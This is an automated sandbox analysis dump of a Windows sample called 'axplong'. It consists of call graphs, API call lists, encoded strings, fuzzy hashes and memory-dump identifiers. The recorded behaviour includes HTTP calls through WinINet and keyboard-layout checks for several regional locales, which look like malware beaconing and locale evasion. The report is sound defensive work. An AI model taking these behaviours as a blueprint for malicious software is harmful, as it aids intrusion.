RtlAllocateHeap 14732->14733 14733->14731 14733->14732 14735 92b592 __cftof 14734->14735 14736 92d6ef RtlAllocateHeap 14735->14736 14737 92b5ae __dosmaperr __freea 
__ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14735->14737 14736->14737 14737->14722 14739 927338 14738->14739 14741 92733e ___std_exception_destroy __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14739->14741 14742 927036 14739->14742 14741->14699 14743 927042 __dosmaperr 14742->14743 14748 92b87b 14743->14748 14745 927068 14745->14741 14746 92705a __dosmaperr 14746->14745 14747 92b87b 2 API calls 14746->14747 14747->14745 14751 92b6de 14748->14751 14750 92b894 14750->14746 14752 92b75a 14751->14752 14753 92b6ee 14751->14753 14768 931ef8 14752->14768 14753->14752 14754 92b6f5 14753->14754 14756 92b702 ___std_exception_destroy 14754->14756 14760 92b675 14754->14760 14756->14750 14758 92b73b 14764 92b815 14758->14764 14761 92b690 14760->14761 14763 92b695 __dosmaperr 14761->14763 14771 92b7b7 14761->14771 14763->14758 14765 92b83b __cftof 14764->14765 14766 92b822 14764->14766 14765->14756 14766->14765 14767 928aa4 ___std_exception_copy RtlAllocateHeap 14766->14767 14767->14765 14778 931d22 14768->14778 14770 931f0f 14770->14756 14772 92b7c5 14771->14772 14775 92b7f6 14772->14775 14776 928aa4 ___std_exception_copy RtlAllocateHeap 14775->14776 14777 92b7d6 14776->14777 14777->14763 14779 931d54 14778->14779 14787 931d40 __cftof __dosmaperr ___std_exception_destroy __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14778->14787 14780 92b568 RtlAllocateHeap 14779->14780 14781 931d5c 14779->14781 14780->14781 14782 92b7b7 RtlAllocateHeap 14781->14782 14781->14787 14783 931de9 14782->14783 14784 92b675 RtlAllocateHeap 14783->14784 14785 931df6 14784->14785 14786 92b815 RtlAllocateHeap 14785->14786 14785->14787 14786->14787 14787->14770 14788 92d6ef 14789 92d6fc __cftof 14788->14789 14790 92d727 RtlAllocateHeap 14789->14790 14791 92d73a __dosmaperr 14789->14791 14790->14789 14790->14791

Control-flow Graph

[Figure: control-flow graph for the code starting at 8fbd60; legend: Executed / Not Executed]
                                                                    APIs
                                                                    • InternetOpenW.WININET(00948D70,00000000,00000000,00000000,00000000), ref: 008FBDED
                                                                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008FBE11
                                                                    • HttpOpenRequestA.WININET(?,00000000), ref: 008FBE5B
                                                                    • HttpSendRequestA.WININET(?,00000000), ref: 008FBF1B
                                                                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 008FBFCC
                                                                    • InternetCloseHandle.WININET(?), ref: 008FC0A7
                                                                    • InternetCloseHandle.WININET(?), ref: 008FC0AF
                                                                    • InternetCloseHandle.WININET(?), ref: 008FC0B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                                                                    • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                                                                    • API String ID: 688256393-332458646
                                                                    • Opcode ID: e6437b3bd137ca55cac62e41ba2224bffca0ed37642df3c99848774588491079
                                                                    • Instruction ID: 65b0796e36b534a9da899ad8f7405e65e070bd8d720d36bd93324a2071be088c
                                                                    • Opcode Fuzzy Hash: e6437b3bd137ca55cac62e41ba2224bffca0ed37642df3c99848774588491079
                                                                    • Instruction Fuzzy Hash: BEB1C5B1A1011C9BEB24CF28CD85BAEBB65FF85314F5041A9F609D72C2DB709AC4CB95
                                                                    APIs
                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 008F247E
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ___std_exception_copy
                                                                    • String ID:
                                                                    • API String ID: 2659868963-0
                                                                    • Opcode ID: d68ccd1783c33a997030b34c20ef025d0d789b842e3173905b9b771a318b3c7e
                                                                    • Instruction ID: 6b0cf0d843a03c3e8a9051ad0e613a714710099721a155eca6d026a0c82aba46
                                                                    • Opcode Fuzzy Hash: d68ccd1783c33a997030b34c20ef025d0d789b842e3173905b9b771a318b3c7e
                                                                    • Instruction Fuzzy Hash: 0551DFB2A167058FDB15CFA9E8917AEB7F8FB48310F24852AD805EB6D1D3349940CF50
                                                                    APIs
                                                                      • Part of subcall function 00907870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0090795C
                                                                      • Part of subcall function 00907870: __Cnd_destroy_in_situ.LIBCPMT ref: 00907968
                                                                      • Part of subcall function 00907870: __Mtx_destroy_in_situ.LIBCPMT ref: 00907971
                                                                      • Part of subcall function 008FBD60: InternetOpenW.WININET(00948D70,00000000,00000000,00000000,00000000), ref: 008FBDED
                                                                      • Part of subcall function 008FBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008FBE11
                                                                      • Part of subcall function 008FBD60: HttpOpenRequestA.WININET(?,00000000), ref: 008FBE5B
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00904EA2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                                                                    • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                                                                    • API String ID: 2414744145-1662704651
                                                                    • Opcode ID: 87d6dc3d8a4164fb04200d3b1f9da87153f9ac900ba61891e389268850b4d56a
                                                                    • Instruction ID: 0e67672c97733a34d992da8a780ee709b0ad92fc6315c422c7b8b6a411af3360
                                                                    • Opcode Fuzzy Hash: 87d6dc3d8a4164fb04200d3b1f9da87153f9ac900ba61891e389268850b4d56a
                                                                    • Instruction Fuzzy Hash: F6231371E002589FEB19DB28CD8979DBB76AB81304F5081D8E448AB2D6EB359FC4CF51

                                                                    Control-flow Graph
                                                                    [Graph not preserved. First block: 8f5df0-8f5eee. API calls named in the graph: RegOpenKeyExA, RegEnumValueW.]
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                    • API String ID: 0-3963862150
                                                                    • Opcode ID: efc5b3c09422a19f8c4302db2dfecda581c67d2a26719ef1b0813b84c32626a6
                                                                    • Instruction ID: 2b3782021958499aa041d3f4ba10bf87303f8a52dfc62c447ee531162c7c8f21
                                                                    • Opcode Fuzzy Hash: efc5b3c09422a19f8c4302db2dfecda581c67d2a26719ef1b0813b84c32626a6
                                                                    • Instruction Fuzzy Hash: 8EE17D7190121CAFEB24DFA4CC89BEEB779EB44304F5042D9E509A7291EB74ABC48F51

                                                                    Control-flow Graph
                                                                    [Graph not preserved. First block: 8f7d00-8f7d82. API calls named in the graph: GetNativeSystemInfo.]
                                                                    APIs
                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008F7EA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoNativeSystem
                                                                    • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                                                                    • API String ID: 1721193555-2057465332
                                                                    • Opcode ID: f6aa4d16a8ab37db4555c762e975c8aabb82854bb058c59c9dc2aa8ec0e2c9db
                                                                    • Instruction ID: cb29cb8010b683c0e446d5955bc010aa9175004a5d865a6d45a53ee4b21f6e34
                                                                    • Opcode Fuzzy Hash: f6aa4d16a8ab37db4555c762e975c8aabb82854bb058c59c9dc2aa8ec0e2c9db
                                                                    • Instruction Fuzzy Hash: 97D1E870E0460C9BDB14EB78CD5A3AD7B61FB82324F904298E915A73C2DB359E8487D2

                                                                    Control-flow Graph
                                                                    [Graph not preserved. First block: 926e01-926e36. API calls named in the graph: GetFileType, GetFileInformationByHandle.]
                                                                    APIs
                                                                    • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00926E23
                                                                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00926E7D
                                                                    • __dosmaperr.LIBCMT ref: 00926F12
                                                                      • Part of subcall function 00927177: __dosmaperr.LIBCMT ref: 009271AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File__dosmaperr$HandleInformationType
                                                                    • String ID:
                                                                    • API String ID: 2531987475-0
                                                                    • Opcode ID: 15eb1d6a9494168f744c2645cc12916a3a95f9dcd578f60c4069e7f0bbd100b6
                                                                    • Instruction ID: 633fc8fe20fb7f6f930cc5dd9b83fb3cabfb98aa82f401d21f5913c4049cdbf1
                                                                    • Opcode Fuzzy Hash: 15eb1d6a9494168f744c2645cc12916a3a95f9dcd578f60c4069e7f0bbd100b6
                                                                    • Instruction Fuzzy Hash: 53414C75901214ABDF24EFB5E945AEFBBF9EF89300B10442DF856E3614EB319904CB61

                                                                    Control-flow Graph
                                                                    [Graph not preserved. First block: 907870-907894. No API names appear in the graph data.]
                                                                    APIs
                                                                    • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0090795C
                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00907968
                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00907971
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                    • String ID:
                                                                    • API String ID: 4078500453-0

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 008F8454
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoNativeSystem
                                                                    • String ID:
                                                                    • API String ID: 1721193555-0

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00926FB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Time$LocalSpecificSystem
                                                                    • String ID:
                                                                    • API String ID: 2574697306-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0092A5ED,?,009274AE,?,00000000,?), ref: 0092D730
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,00906B27,?,?,0090D32C,00906B27,?,009078FB,8B18EC84,05280A88), ref: 0092AF3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: c7872a298107b8598f810de7dcae96bfc96ca77e4d934527f6eef2ab800089f4
                                                                    • Instruction ID: dcd8b7dec182752e896b5972a122e031474c06932eb801f694c96d42f8c34591
                                                                    • Opcode Fuzzy Hash: c7872a298107b8598f810de7dcae96bfc96ca77e4d934527f6eef2ab800089f4
                                                                    • Instruction Fuzzy Hash: BBE02B7321A23157EB2132667E00BEB768DAF813B1F040051AD589219CCF2CDC0052E3
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a45d64daf01a10eee9d8d285cc9f1f38f12cad2f615b885261e048e7b0337824
                                                                    • Instruction ID: 75a07da6e0233a3af3c05c89d1887db8b75401fc820b232d6181055d253dcef8
                                                                    • Opcode Fuzzy Hash: a45d64daf01a10eee9d8d285cc9f1f38f12cad2f615b885261e048e7b0337824
                                                                    • Instruction Fuzzy Hash: 6DF0D171E14608ABC600BBB99D06B1DBB74EB87760F800358E911672E1DB346A0487E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7d4b43073d1733caa1b52f918e3a8650a92a00cacbdaa50956a6bde2dd3bed12
                                                                    • Instruction ID: dbf59151ef4e8e7461f9a8c47a277fe00e9d701bd896007db7bfb926f53f7498
                                                                    • Opcode Fuzzy Hash: 7d4b43073d1733caa1b52f918e3a8650a92a00cacbdaa50956a6bde2dd3bed12
                                                                    • Instruction Fuzzy Hash: B53189EB17C124BD7151C5427B6CAFBA76EE9C2730330843AFA03C5907E2D90A591231
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4d49c407991fa48dc7c542a08ae432a426286d0c2009a9840e0075198626869c
                                                                    • Instruction ID: f28474a2e4e3dc6c7db09793d2ac7afbca1fb040e949a6dfdec0d2ef1c21a8ea
                                                                    • Opcode Fuzzy Hash: 4d49c407991fa48dc7c542a08ae432a426286d0c2009a9840e0075198626869c
                                                                    • Instruction Fuzzy Hash: D03189EB53C124BD7052C0417F2CAFAAB6EE9D2734330843AFA07C5903E2D90A591231
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9a82c6510e645ba9de32dad82060c8581d1a314837da91e94c0b3b22cf1d02c
                                                                    • Instruction ID: 08374664185fa8b7304a784dc416674192dba515425fcba4aa26c2a10f9b5d9a
                                                                    • Opcode Fuzzy Hash: e9a82c6510e645ba9de32dad82060c8581d1a314837da91e94c0b3b22cf1d02c
                                                                    • Instruction Fuzzy Hash: 713145EB13C125BD7152C0427F2CAFBAB6EE9C2730330843AFA07C5943E2D90A591272
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 10c53fce7cfb92b8170530e2d2adb36d200803dbee217ce01fd84c59c7b0d943
                                                                    • Instruction ID: a4c546aabc74526eeed25ffbb52d8fc51e61201213c015ecc631cb62925f6b27
                                                                    • Opcode Fuzzy Hash: 10c53fce7cfb92b8170530e2d2adb36d200803dbee217ce01fd84c59c7b0d943
                                                                    • Instruction Fuzzy Hash: EB3132EB13C124BD7152C1427F2CAFBAB6FE9D6734331843AFA07C5A47A2D91A591231
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65194ca09f21698a760c15f1d92d3083566bb8d6aff160e8805f25b19d9aeea4
                                                                    • Instruction ID: 5cc01147d31370550aedb5a7feb61879b4cb9c6aee12fb86cc0128e73f9686ed
                                                                    • Opcode Fuzzy Hash: 65194ca09f21698a760c15f1d92d3083566bb8d6aff160e8805f25b19d9aeea4
                                                                    • Instruction Fuzzy Hash: A7319AEB13C120BDB142C1417F5CAFBABAEE9C2A30330842BFA03C5947E2D90A495271
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9ce92a40284451f000012a53bd4b9f812aacea091536822563e94837555a536
                                                                    • Instruction ID: ae397fc3abd96d6ef29834b4393fa94ddaf6f83c01ebd0188f258b424619935d
                                                                    • Opcode Fuzzy Hash: a9ce92a40284451f000012a53bd4b9f812aacea091536822563e94837555a536
                                                                    • Instruction Fuzzy Hash: 992149EB53C114BDB151C1417F1CAFBA7AEE9C6734330843AFA07D4947E2D91A591271
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 87e70fe3418709d5ab0d5b9db1ed5cd609fc83bd0849fedb7d10187ada0c1a68
                                                                    • Instruction ID: 400aeec766dd12b2a82384515344af584174bdb49a4f9240ecc5ad099ce18e2d
                                                                    • Opcode Fuzzy Hash: 87e70fe3418709d5ab0d5b9db1ed5cd609fc83bd0849fedb7d10187ada0c1a68
                                                                    • Instruction Fuzzy Hash: 1A217CEB13C114BDB141C1517F6CAFBABAEEAC2730330852BFA03C5547D2D91A591272
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 364467e3304739a4e6fb882fbd886a6517e50ddd00bc2a5c724796163ab32660
                                                                    • Instruction ID: b49a59f065f0e04e70e019077ef7056801b5276fd89bc59680cc0fefdfc50e3c
                                                                    • Opcode Fuzzy Hash: 364467e3304739a4e6fb882fbd886a6517e50ddd00bc2a5c724796163ab32660
                                                                    • Instruction Fuzzy Hash: 402106EB13C124BD7151C5427F6CAFBA7AFE9D6B30330842AFA07D4947A2D91A591231
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11db1bf61485f9cf658faafface850646d93521035b240d37739f61f8151fc53
                                                                    • Instruction ID: 58b747de0220ba90cf81e81c831a1b80080bc9590ebbcf92ddb1488fda83b6d0
                                                                    • Opcode Fuzzy Hash: 11db1bf61485f9cf658faafface850646d93521035b240d37739f61f8151fc53
                                                                    • Instruction Fuzzy Hash: BB219CEB13C114BD7511C5517B6CAFBAB6FEAC6B30331842BFA07C4907E2D90A4A5232
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c31197dc344d8ca6046bf4a18ba349d7e877c6ef0efc21903a8d1b72e64d105
                                                                    • Instruction ID: a3b623ec92c5e26253751b82650ca76eaec517d8a151a252b3ec2acb4b38f825
                                                                    • Opcode Fuzzy Hash: 0c31197dc344d8ca6046bf4a18ba349d7e877c6ef0efc21903a8d1b72e64d105
                                                                    • Instruction Fuzzy Hash: 962169EB53C114BD7151C1423F5CAFBABAEE9D6730330882AFA03C5947E2E91A591272
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff4ffcc617c2500221f9405771defd97ff7267c3af5ca3f6d6f959da72751756
                                                                    • Instruction ID: 4d773bc6a97bfecba4a0d80e55ef2015937461fd69e2b763f07aedc1eeed6015
                                                                    • Opcode Fuzzy Hash: ff4ffcc617c2500221f9405771defd97ff7267c3af5ca3f6d6f959da72751756
                                                                    • Instruction Fuzzy Hash: 1A2116EB13C124BD7151C1427F6CAFBABAFE9D6730330842AFA07D4947A2D91A591272
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5134ed55db68d4b78b65265515735d0dc07bd20541fc8698b9161fffb8cfbef
                                                                    • Instruction ID: add8979e14e330cccd0985f0a0f207b2cb3fe200b5543b3f7743e7d03a875050
                                                                    • Opcode Fuzzy Hash: a5134ed55db68d4b78b65265515735d0dc07bd20541fc8698b9161fffb8cfbef
                                                                    • Instruction Fuzzy Hash: 6911EEAB53C114EDA210D5217E6C9FAAB6BEDC2730331842AF503C5807D2A95A491232
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 81b66cb5b6c9ca5529e9d1a438239abf645086270d5c40d5777347d90ae32504
                                                                    • Instruction ID: 013273fcade3abff6df4bffc4b216ea2d4203655e8a74025e3f0b83e9d4e0daa
                                                                    • Opcode Fuzzy Hash: 81b66cb5b6c9ca5529e9d1a438239abf645086270d5c40d5777347d90ae32504
                                                                    • Instruction Fuzzy Hash: 9111BCAB53C110ED7251D5513B5CAFAAB6FE9D27703308836FA03D490392D40A595232
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e0cac2f1e38bc27107829b86bc5fb8af19c0589a9092b191ea2ff6e482784d1
                                                                    • Instruction ID: b60a4eb31b0fa486a9c0fca08107b2e49e2684bca41bcd72c6e662fac4f696ac
                                                                    • Opcode Fuzzy Hash: 5e0cac2f1e38bc27107829b86bc5fb8af19c0589a9092b191ea2ff6e482784d1
                                                                    • Instruction Fuzzy Hash: D911A0BF23C115ADB011D5657B5CEFAAB6EEEC2B30331892AF603C5443D3D56A4A1271
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 471269d726843af832985ff3f0d58a99226276adbb6d8ecbeaf485e95b53414f
